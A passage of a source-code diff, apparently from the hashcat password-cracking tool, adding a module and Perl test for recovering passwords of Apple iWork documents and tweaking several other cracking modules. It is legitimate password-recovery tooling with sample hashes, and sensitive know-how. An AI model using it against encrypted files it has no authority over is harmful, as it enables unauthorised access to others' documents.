+          if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+        }
+
+        device_param->device_available_mem = MAX_ALLOC_CHECKS_SIZE;
+
+        if (c > 0)
+        {
+          device_param->device_available_mem *= c;
+        }
+
+        // clean up
+
+        for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
+        {
+          if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
+
+          if (tmp_device[c] != NULL)
+          {
+            if (hc_clReleaseMemObject (hashcat_ctx, tmp_device[c]) == -1) return -1;
+          }
+        }
+
+        hcfree (tmp_device);
+      }
+
+      hc_clReleaseCommandQueue (hashcat_ctx, command_queue);
+
+      hc_clReleaseContext (hashcat_ctx, context);
     }
   }
 
diff --git a/src/modules/module_11300.c b/src/modules/module_11300.c
index 044383bf0..bf9833fc3 100644
--- a/src/modules/module_11300.c
+++ b/src/modules/module_11300.c
@@ -26,7 +26,8 @@ static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
 static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE
                                   | OPTS_TYPE_ST_HEX
                                   | OPTS_TYPE_ST_ADD80
-                                  | OPTS_TYPE_HASH_COPY;
+                                  | OPTS_TYPE_HASH_COPY
+                                  | OPTS_TYPE_DEEP_COMP_KERNEL;
 static const u32   SALT_TYPE      = SALT_TYPE_EMBEDDED;
 static const char *ST_PASS        = "hashcat";
 static const char *ST_HASH        = "$bitcoin$96$c265931309b4a59307921cf054b4ec6b6e4554369be79802e94e16477645777d948ae1d375191831efc78e5acd1f0443$16$8017214013543185$200460$96$480008005625057442352316337722323437108374245623701184230273883222762730232857701607167815448714$66$014754433300175043011633205413774877455616682000536368706315333388";
@@ -100,6 +101,11 @@ char *module_jit_build_options (MAYBE_UNUSED const hashconfig_t *hashconfig, MAY
   return jit_build_options;
 }
 
+u32 module_deep_comp_kernel (MAYBE_UNUSED const hashes_t *hashes, MAYBE_UNUSED const u32 salt_pos, MAYBE_UNUSED const u32 digest_pos)
+{
+  return KERN_RUN_3;
+}
+
 u64 module_esalt_size (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
 {
   const u64 esalt_size = (const u64) sizeof (bitcoin_wallet_t);
@@ -283,7 +289,7 @@ void module_init (module_ctx_t *module_ctx)
   module_ctx->module_benchmark_mask           = MODULE_DEFAULT;
   module_ctx->module_benchmark_salt           = MODULE_DEFAULT;
   module_ctx->module_build_plain_postprocess  = MODULE_DEFAULT;
-  module_ctx->module_deep_comp_kernel         = MODULE_DEFAULT;
+  module_ctx->module_deep_comp_kernel         = module_deep_comp_kernel;
   module_ctx->module_dgst_pos0                = module_dgst_pos0;
   module_ctx->module_dgst_pos1                = module_dgst_pos1;
   module_ctx->module_dgst_pos2                = module_dgst_pos2;
diff --git a/src/modules/module_13200.c b/src/modules/module_13200.c
index 62641dde1..e82bc01a2 100644
--- a/src/modules/module_13200.c
+++ b/src/modules/module_13200.c
@@ -17,7 +17,7 @@ static const u32   DGST_POS2      = 2;
 static const u32   DGST_POS3      = 3;
 static const u32   DGST_SIZE      = DGST_SIZE_4_4;
 static const u32   HASH_CATEGORY  = HASH_CATEGORY_ARCHIVE;
-static const char *HASH_NAME      = "AxCrypt";
+static const char *HASH_NAME      = "AxCrypt 1";
 static const u64   KERN_TYPE      = 13200;
 static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE;
 static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE;
diff --git a/src/modules/module_13300.c b/src/modules/module_13300.c
index 3a24a8e17..9fae83b87 100644
--- a/src/modules/module_13300.c
+++ b/src/modules/module_13300.c
@@ -17,7 +17,7 @@ static const u32   DGST_POS2      = 3;
 static const u32   DGST_POS3      = 2;
 static const u32   DGST_SIZE      = DGST_SIZE_4_5;
 static const u32   HASH_CATEGORY  = HASH_CATEGORY_ARCHIVE;
-static const char *HASH_NAME      = "AxCrypt in-memory SHA1";
+static const char *HASH_NAME      = "AxCrypt 1 in-memory SHA1";
 static const u64   KERN_TYPE      = 13300;
 static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
                                   | OPTI_TYPE_PRECOMPUTE_INIT
diff --git a/src/modules/module_14800.c b/src/modules/module_14800.c
index 26926f661..99e634848 100644
--- a/src/modules/module_14800.c
+++ b/src/modules/module_14800.c
@@ -21,7 +21,8 @@ static const u32   HASH_CATEGORY  = HASH_CATEGORY_ARCHIVE;
 static const char *HASH_NAME      = "iTunes backup >= 10.0";
 static const u64   KERN_TYPE      = 14800;
 static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
-                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP;
+                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP
+                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP2;
 static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE
                                   | OPTS_TYPE_ST_HEX
                                   | OPTS_TYPE_INIT2
diff --git a/src/modules/module_23300.c b/src/modules/module_23300.c
new file mode 100644
index 000000000..7b085db3a
--- /dev/null
+++ b/src/modules/module_23300.c
@@ -0,0 +1,327 @@
+/**
+ * Author......: See docs/credits.txt
+ * License.....: MIT
+ */
+
+#include "common.h"
+#include "types.h"
+#include "modules.h"
+#include "bitops.h"
+#include "convert.h"
+#include "shared.h"
+
+static const u32   ATTACK_EXEC    = ATTACK_EXEC_OUTSIDE_KERNEL;
+static const u32   DGST_POS0      = 0;
+static const u32   DGST_POS1      = 1;
+static const u32   DGST_POS2      = 2;
+static const u32   DGST_POS3      = 3;
+static const u32   DGST_SIZE      = DGST_SIZE_4_4;
+static const u32   HASH_CATEGORY  = HASH_CATEGORY_DOCUMENTS;
+static const char *HASH_NAME      = "Apple iWork";
+static const u64   KERN_TYPE      = 23300;
+static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
+                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP;
+static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE
+                                  | OPTS_TYPE_ST_HEX;
+static const u32   SALT_TYPE      = SALT_TYPE_EMBEDDED;
+static const char *ST_PASS        = "hashcat";
+static const char *ST_HASH        = "$iwork$2$1$1$4000$b31b7320d1e7a5ee$01f54d6f9e5090eb16fef2b05f8242bc$69561c985268326b7353fb22c3685a378341127557bd2bbea1bd10afb31f2127344707b662a2c29480c32b8b93dea0538327f604e5aa8733be83af25f370f7ac";
+
+u32         module_attack_exec    (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return ATTACK_EXEC;     }
+u32         module_dgst_pos0      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS0;       }
+u32         module_dgst_pos1      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS1;       }
+u32         module_dgst_pos2      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS2;       }
+u32         module_dgst_pos3      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS3;       }
+u32         module_dgst_size      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_SIZE;       }
+u32         module_hash_category  (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return HASH_CATEGORY;   }
+const char *module_hash_name      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return HASH_NAME;       }
+u64         module_kern_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return KERN_TYPE;       }
+u32         module_opti_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return OPTI_TYPE;       }
+u64         module_opts_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return OPTS_TYPE;       }
+u32         module_salt_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return SALT_TYPE;       }
+const char *module_st_hash        (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return ST_HASH;         }
+const char *module_st_pass        (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return ST_PASS;         }
+
+typedef struct iwork_tmp
+{
+  u32 ipad[5];
+  u32 opad[5];
+
+  u32 dgst[5];
+  u32 out[5];
+
+} iwork_tmp_t;
+
+typedef struct iwork
+{
+  u32 iv[4];
+  u32 data[16];
+
+} iwork_t;
+
+static const char *SIGNATURE_IWORK  = "$iwork$";
+static const u32   FORMAT_NUM_IWORK = 1;
+
+u64 module_tmp_size (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
+{
+  const u64 tmp_size = (const u64) sizeof (iwork_tmp_t);
+
+  return tmp_size;
+}
+
+u64 module_esalt_size (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
+{
+  const u64 esalt_size = (const u64) sizeof (iwork_t);
+
+  return esalt_size;
+}
+
+u32 module_pw_max (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
+{
+  // this overrides the reductions of PW_MAX in case optimized kernel is selected
+  // IOW, even in optimized kernel mode it support length 256
+
+  const u32 pw_max = PW_MAX;
+
+  return pw_max;
+}
+
+int module_hash_decode (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED void *digest_buf, MAYBE_UNUSED salt_t *salt, MAYBE_UNUSED void *esalt_buf, MAYBE_UNUSED void *hook_salt_buf, MAYBE_UNUSED hashinfo_t *hash_info, const char *line_buf, MAYBE_UNUSED const int line_len)
+{
+  u32 *digest = (u32 *) digest_buf;
+
+  iwork_t *iwork = (iwork_t *) esalt_buf;
+
+  token_t token;
+
+  token.token_cnt  = 8;
+
+  token.signatures_cnt    = 1;
+  token.signatures_buf[0] = SIGNATURE_IWORK;
+
+  token.len[0]     = 7;
+  token.attr[0]    = TOKEN_ATTR_FIXED_LENGTH
+                   | TOKEN_ATTR_VERIFY_SIGNATURE;
+
+  token.len_min[1] = 1;
+  token.len_max[1] = 1;
+  token.sep[1]     = '$';
+  token.attr[1]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[2] = 1;
+  token.len_max[2] = 1;
+  token.sep[2]     = '$';
+  token.attr[2]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[3] = 1;
+  token.len_max[3] = 1;
+  token.sep[3]     = '$';
+  token.attr[3]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[4] = 4;
+  token.len_max[4] = 6;
+  token.sep[4]     = '$';
+  token.attr[4]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[5] = 16;
+  token.len_max[5] = 32;
+  token.sep[5]     = '$';
+  token.attr[5]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_HEX;
+
+  token.len_min[6] = 32;
+  token.len_max[6] = 32;
+  token.sep[6]     = '$';
+  token.attr[6]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_HEX;
+
+  token.len[7]     = 128;
+  token.attr[7]    = TOKEN_ATTR_FIXED_LENGTH
+                   | TOKEN_ATTR_VERIFY_HEX;
+
+  const int rc_tokenizer = input_tokenizer ((const u8 *) line_buf, line_len, &token);
+
+  if (rc_tokenizer != PARSER_OK) return (rc_tokenizer);
+
+  const u8 *hash_ver_pos   = token.buf[1];
+  const u8 *file_ver_pos   = token.buf[2];
+  const u8 *format_ver_pos = token.buf[3];
+
+  const u32 hash_ver   = hc_strtoul ((const char *) hash_ver_pos,   NULL, 10);
+  const u32 file_ver   = hc_strtoul ((const char *) file_ver_pos,   NULL, 10);
+  const u32 format_ver = hc_strtoul ((const char *) format_ver_pos, NULL, 10);
+
+  if (format_ver != FORMAT_NUM_IWORK) return (PARSER_SALT_VALUE);
+
+  if ((hash_ver != 1) && (hash_ver != 2)) return (PARSER_SALT_VALUE);
+  if ((file_ver != 1) && (file_ver != 2)) return (PARSER_SALT_VALUE);
+
+  salt->salt_sign[0] = hash_ver;
+  salt->salt_sign[1] = file_ver;
+
+  const u8 *iter_pos = token.buf[4];
+
+  const u32 iterations = hc_strtoul ((const char *) iter_pos, NULL, 10);
+
+  if (iterations <   1000) return (PARSER_SALT_ITERATION);
+  if (iterations > 999999) return (PARSER_SALT_ITERATION);
+
+  salt->salt_iter = iterations - 1;
+
+  // salt
+
+  const u8 *salt_pos = token.buf[5];
+  const int salt_len = token.len[5];
+
+  const bool parse_rc = generic_salt_decode (hashconfig, salt_pos, salt_len, (u8 *) salt->salt_buf, (int *) &salt->salt_len);
+
+  salt->salt_buf[0] = byte_swap_32 (salt->salt_buf[0]);
+  salt->salt_buf[1] = byte_swap_32 (salt->salt_buf[1]);
+  salt->salt_buf[2] = byte_swap_32 (salt->salt_buf[2]);
+  salt->salt_buf[3] = byte_swap_32 (salt->salt_buf[3]);
+
+  if (parse_rc == false) return (PARSER_SALT_LENGTH);
+
+  // IV
+
+  const u8 *iv_pos = token.buf[6];
+  const int iv_len = token.len[6];
+
+  hex_decode (iv_pos, iv_len, (u8 *) iwork->iv);
+
+  // data
+
+  const u8 *data_pos = token.buf[7];
+  const int data_len = token.len[7];
+
+  hex_decode (data_pos, data_len, (u8 *) iwork->data);
+
+  // fake digest
+
+  digest[0] = iwork->data[0];
+  digest[1] = iwork->data[1];
+  digest[2] = iwork->data[2];
+  digest[3] = iwork->data[3];
+
+  return (PARSER_OK);
+}
+
+int module_hash_encode (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const void *digest_buf, MAYBE_UNUSED const salt_t *salt, MAYBE_UNUSED const void *esalt_buf, MAYBE_UNUSED const void *hook_salt_buf, MAYBE_UNUSED const hashinfo_t *hash_info, char *line_buf, MAYBE_UNUSED const int line_size)
+{
+  const iwork_t *iwork = (const iwork_t *) esalt_buf;
+
+  // salt
+
+  u32 tmp_salt[4] = { 0 };
+
+  tmp_salt[0] = byte_swap_32 (salt->salt_buf[0]);
+  tmp_salt[1] = byte_swap_32 (salt->salt_buf[1]);
+  tmp_salt[2] = byte_swap_32 (salt->salt_buf[2]);
+  tmp_salt[3] = byte_swap_32 (salt->salt_buf[3]);
+
+  char salt_hex[33] = { 0 };
+
+  generic_salt_encode (hashconfig, (const u8 *) tmp_salt, (const int) salt->salt_len, (u8 *) salt_hex);
+
+  // iv
+
+  u8 iv_hex[33] = { 0 };
+
+  hex_encode ((u8 *) iwork->iv, 16, iv_hex);
+
+  // data
+
+  u8 data_hex[129] = { 0 };
+
+  hex_encode ((u8 *) iwork->data, 64, data_hex);
+
+  int out_len = snprintf (line_buf, line_size, "%s%u$%u$%u$%u$%s$%s$%s",
+    SIGNATURE_IWORK,
+    salt->salt_sign[0],
+    salt->salt_sign[1],
+    FORMAT_NUM_IWORK,
+    salt->salt_iter + 1,
+    salt_hex,
+    iv_hex,
+    data_hex
+  );
+
+  return out_len;
+}
+
+void module_init (module_ctx_t *module_ctx)
+{
+  module_ctx->module_context_size             = MODULE_CONTEXT_SIZE_CURRENT;
+  module_ctx->module_interface_version        = MODULE_INTERFACE_VERSION_CURRENT;
+
+  module_ctx->module_attack_exec              = module_attack_exec;
+  module_ctx->module_benchmark_esalt          = MODULE_DEFAULT;
+  module_ctx->module_benchmark_hook_salt      = MODULE_DEFAULT;
+  module_ctx->module_benchmark_mask           = MODULE_DEFAULT;
+  module_ctx->module_benchmark_salt           = MODULE_DEFAULT;
+  module_ctx->module_build_plain_postprocess  = MODULE_DEFAULT;
+  module_ctx->module_deep_comp_kernel         = MODULE_DEFAULT;
+  module_ctx->module_dgst_pos0                = module_dgst_pos0;
+  module_ctx->module_dgst_pos1                = module_dgst_pos1;
+  module_ctx->module_dgst_pos2                = module_dgst_pos2;
+  module_ctx->module_dgst_pos3                = module_dgst_pos3;
+  module_ctx->module_dgst_size                = module_dgst_size;
+  module_ctx->module_dictstat_disable         = MODULE_DEFAULT;
+  module_ctx->module_esalt_size               = module_esalt_size;
+  module_ctx->module_extra_buffer_size        = MODULE_DEFAULT;
+  module_ctx->module_extra_tmp_size           = MODULE_DEFAULT;
+  module_ctx->module_forced_outfile_format    = MODULE_DEFAULT;
+  module_ctx->module_hash_binary_count        = MODULE_DEFAULT;
+  module_ctx->module_hash_binary_parse        = MODULE_DEFAULT;
+  module_ctx->module_hash_binary_save         = MODULE_DEFAULT;
+  module_ctx->module_hash_decode_potfile      = MODULE_DEFAULT;
+  module_ctx->module_hash_decode_zero_hash    = MODULE_DEFAULT;
+  module_ctx->module_hash_decode              = module_hash_decode;
+  module_ctx->module_hash_encode_status       = MODULE_DEFAULT;
+  module_ctx->module_hash_encode_potfile      = MODULE_DEFAULT;
+  module_ctx->module_hash_encode              = module_hash_encode;
+  module_ctx->module_hash_init_selftest       = MODULE_DEFAULT;
+  module_ctx->module_hash_mode                = MODULE_DEFAULT;
+  module_ctx->module_hash_category            = module_hash_category;
+  module_ctx->module_hash_name                = module_hash_name;
+  module_ctx->module_hashes_count_min         = MODULE_DEFAULT;
+  module_ctx->module_hashes_count_max         = MODULE_DEFAULT;
+  module_ctx->module_hlfmt_disable            = MODULE_DEFAULT;
+  module_ctx->module_hook12                   = MODULE_DEFAULT;
+  module_ctx->module_hook23                   = MODULE_DEFAULT;
+  module_ctx->module_hook_salt_size           = MODULE_DEFAULT;
+  module_ctx->module_hook_size                = MODULE_DEFAULT;
+  module_ctx->module_jit_build_options        = MODULE_DEFAULT;
+  module_ctx->module_jit_cache_disable        = MODULE_DEFAULT;
+  module_ctx->module_kernel_accel_max         = MODULE_DEFAULT;
+  module_ctx->module_kernel_accel_min         = MODULE_DEFAULT;
+  module_ctx->module_kernel_loops_max         = MODULE_DEFAULT;
+  module_ctx->module_kernel_loops_min         = MODULE_DEFAULT;
+  module_ctx->module_kernel_threads_max       = MODULE_DEFAULT;
+  module_ctx->module_kernel_threads_min       = MODULE_DEFAULT;
+  module_ctx->module_kern_type                = module_kern_type;
+  module_ctx->module_kern_type_dynamic        = MODULE_DEFAULT;
+  module_ctx->module_opti_type                = module_opti_type;
+  module_ctx->module_opts_type                = module_opts_type;
+  module_ctx->module_outfile_check_disable    = MODULE_DEFAULT;
+  module_ctx->module_outfile_check_nocomp     = MODULE_DEFAULT;
+  module_ctx->module_potfile_custom_check     = MODULE_DEFAULT;
+  module_ctx->module_potfile_disable          = MODULE_DEFAULT;
+  module_ctx->module_potfile_keep_all_hashes  = MODULE_DEFAULT;
+  module_ctx->module_pwdump_column            = MODULE_DEFAULT;
+  module_ctx->module_pw_max                   = module_pw_max;
+  module_ctx->module_pw_min                   = MODULE_DEFAULT;
+  module_ctx->module_salt_max                 = MODULE_DEFAULT;
+  module_ctx->module_salt_min                 = MODULE_DEFAULT;
+  module_ctx->module_salt_type                = module_salt_type;
+  module_ctx->module_separator                = MODULE_DEFAULT;
+  module_ctx->module_st_hash                  = module_st_hash;
+  module_ctx->module_st_pass                  = module_st_pass;
+  module_ctx->module_tmp_size                 = module_tmp_size;
+  module_ctx->module_unstable_warning         = MODULE_DEFAULT;
+  module_ctx->module_warmup_disable           = MODULE_DEFAULT;
+}
diff --git a/tools/test_modules/m23300.pm b/tools/test_modules/m23300.pm
new file mode 100644
index 000000000..55278f77b
--- /dev/null
+++ b/tools/test_modules/m23300.pm
@@ -0,0 +1,148 @@
+#!/usr/bin/env perl
+
+##
+## Author......: See docs/credits.txt
+## License.....: MIT
+##
+
+use strict;
+use warnings;
+
+use Digest::SHA qw (sha256);
+use Crypt::PBKDF2;
+use Crypt::CBC;
+
+sub module_constraints { [[0, 256], [32, 32], [-1, -1], [-1, -1], [-1, -1]] }
+
+sub module_generate_hash
+{
+  my $word     = shift;
+  my $salt     = shift;
+  my $hash_ver = shift;
+  my $file_ver = shift;
+  my $iter     = shift;
+  my $iv       = shift;
+  my $data     = shift;
+
+  my $FORMAT = 1;
+
+  my $is_decrypt = defined ($data);
+
+  if ($is_decrypt == 0)
+  {
+    my $type = random_number (1, 2);
+
+    if ($type == 1)
+    {
+      $hash_ver = 1;
+      $file_ver = 2;
+
+      $iter = 100000;
+      $salt = substr ($salt, 0, 32); # full one
+    }
+    else
+    {
+      $hash_ver = 2;
+      $file_ver = 1;
+
+      $iter = 4000;
+      $salt = substr ($salt, 0, 16);
+    }
+
+    $salt = pack ("H*", $salt);
+
+    $iv   = random_bytes (16);
+    $data = random_bytes (32);
+
+    $data .= sha256 ($data);
+  }
+
+  my $pbkdf2 = Crypt::PBKDF2->new
+  (
+    hasher     => Crypt::PBKDF2->hasher_from_algorithm ('HMACSHA1'),
+    iterations => $iter,
+    output_len => 16,
+  );
+
+  my $key = $pbkdf2->PBKDF2 ($salt, $word);
+
+  # AES-CBC
+
+  my $cipher = Crypt::CBC->new ({
+    cipher      => "Crypt::Rijndael",
+    key         => $key,
+    iv          => $iv,
+    keysize     => 16,
+    literal_key => 1,
+    header      => "none",
+    padding     => "null"
+  });
+
+  if ($is_decrypt == 1)
+  {
+    my $hash_data = $data;
+
+    $data = "WRONG";
+
+    my $decrypted = $cipher->decrypt ($hash_data);
+
+    my $raw_data = substr ($decrypted,  0, 32);
+    my $checksum = substr ($decrypted, 32, 32);
+
+    my $sha256_of_data = sha256 ($raw_data);
+
+    if ($sha256_of_data eq $checksum)
+    {
+      $data = $decrypted;
+    }
+  }
+
+  my $encrypted = $cipher->encrypt ($data);
+
+  my $hash = sprintf ("\$iwork\$%i\$%i\$%i\$%i\$%s\$%s\$%s", $hash_ver, $file_ver, $FORMAT, $iter, unpack ("H*", $salt), unpack ("H*", $iv), unpack ("H*", $encrypted));
+
+  return $hash;
+}
+
+sub module_verify_hash
+{
+  my $line = shift;
+
+  my $idx = index ($line, ':');
+
+  return unless $idx >= 0;
+
+  my $hash = substr ($line, 0, $idx);
+  my $word = substr ($line, $idx + 1);
+
+  return unless substr ($hash, 0, 7) eq '$iwork$';
+
+  my (undef, undef, $hash_ver, $file_ver, $format, $iter, $salt, $iv, $data) = split '\$', $hash;
+
+  next unless (defined ($hash_ver));
+  next unless (defined ($file_ver));
+  next unless (defined ($format));
+  next unless (defined ($iter));
+  next unless (defined ($salt));
+  next unless (defined ($iv));
+  next unless (defined ($data));
+
+  next unless (($hash_ver eq '1') or ($hash_ver eq '2'));
+  next unless (($file_ver eq '1') or ($file_ver eq '2'));
+
+  next unless ($format eq '1');
+
+  $salt = pack ("H*", $salt);
+  $iv   = pack ("H*", $iv);
+  $data = pack ("H*", $data);
+
+  $iter = int ($iter);
+
+  my $word_packed = pack_if_HEX_notation ($word);
+
+  my $new_hash = module_generate_hash ($word_packed, $salt, $hash_ver, $file_ver, $iter, $iv, $data);
+
+  return ($new_hash, $word);
+}
+
+1;